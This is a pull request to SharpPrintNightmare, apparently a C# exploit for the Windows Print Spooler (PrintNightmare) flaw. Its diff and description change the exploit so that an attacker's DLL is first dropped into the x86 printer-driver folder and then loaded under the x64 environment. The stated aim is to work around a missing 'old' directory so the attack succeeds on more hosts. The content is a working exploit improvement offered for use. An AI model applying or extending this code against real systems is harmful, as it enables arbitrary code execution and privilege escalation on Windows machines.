### PR TITLE
Drop file to x86 folder then load with x64

### DIFF
--- a/SharpPrintNightmare/SharpPrintNightmare/Program.cs
+++ b/SharpPrintNightmare/SharpPrintNightmare/Program.cs
@@ -117,16 +117,20 @@ namespace SharpPrintNightmare
 
             //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug
             //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug
+            string pDriverPathX86 = pDriverPath.Replace("ntprint.inf_amd64", "ntprint.inf_x86");
+            pDriverPathX86 = pDriverPathX86.Replace("Amd64", "I386");
+            
             Console.WriteLine($"[*] pDriverPath {pDriverPath}");
+            Console.WriteLine($"[*] pDriverPathX86 {pDriverPathX86}");
             Console.WriteLine($"[*] Executing {dllpath}");
 
-            //DRIVER_INFO_2 Level2 = drivers[0]; // debug
+            //First drop to x86 folder
             DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
             Level2.cVersion = 3;
-            Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
+            Level2.pConfigFile = "C:\\Windows\\SysWOW64\\kernelbase.dll";
             Level2.pDataFile = dllpath;
-            Level2.pDriverPath = pDriverPath;
-            Level2.pEnvironment = "Windows x64";
+            Level2.pDriverPath = pDriverPathX86;
+            Level2.pEnvironment = "Windows NT x86";
             Level2.pName = "12345";
 
             string filename = Path.GetFileName(dllpath);
@@ -143,8 +147,12 @@ namespace SharpPrintNightmare
 
             for (int i = 1; i <= 30; i++)
             {
-                //add path to our exploit
-                Level2.pConfigFile = $"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{i}\\{filename}";
+                //Then load it
+                Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
+                Level2.pDriverPath = pDriverPath;
+                Level2.pEnvironment = "Windows x64";
+                Level2.pConfigFile = $"C:\\Windows\\System32\\spool\\drivers\\W32X86\\3\\{filename}";
+                
                 //convert struct to unmanage code
                 IntPtr pnt2 = Marshal.AllocHGlobal(Marshal.SizeOf(Level2));
                 Marshal.StructureToPtr(Level2, pnt2, false);


### PR DESCRIPTION
The original SharpPrintNightmare doesn't work for me, the folder "old" and "new" doesn't exist
Use the new method inspired by @marcmaiffret
https://twitter.com/marcmaiffret/status/1410991047652507655
First: drop dll into x86 folder
Then load dll in x64 context,

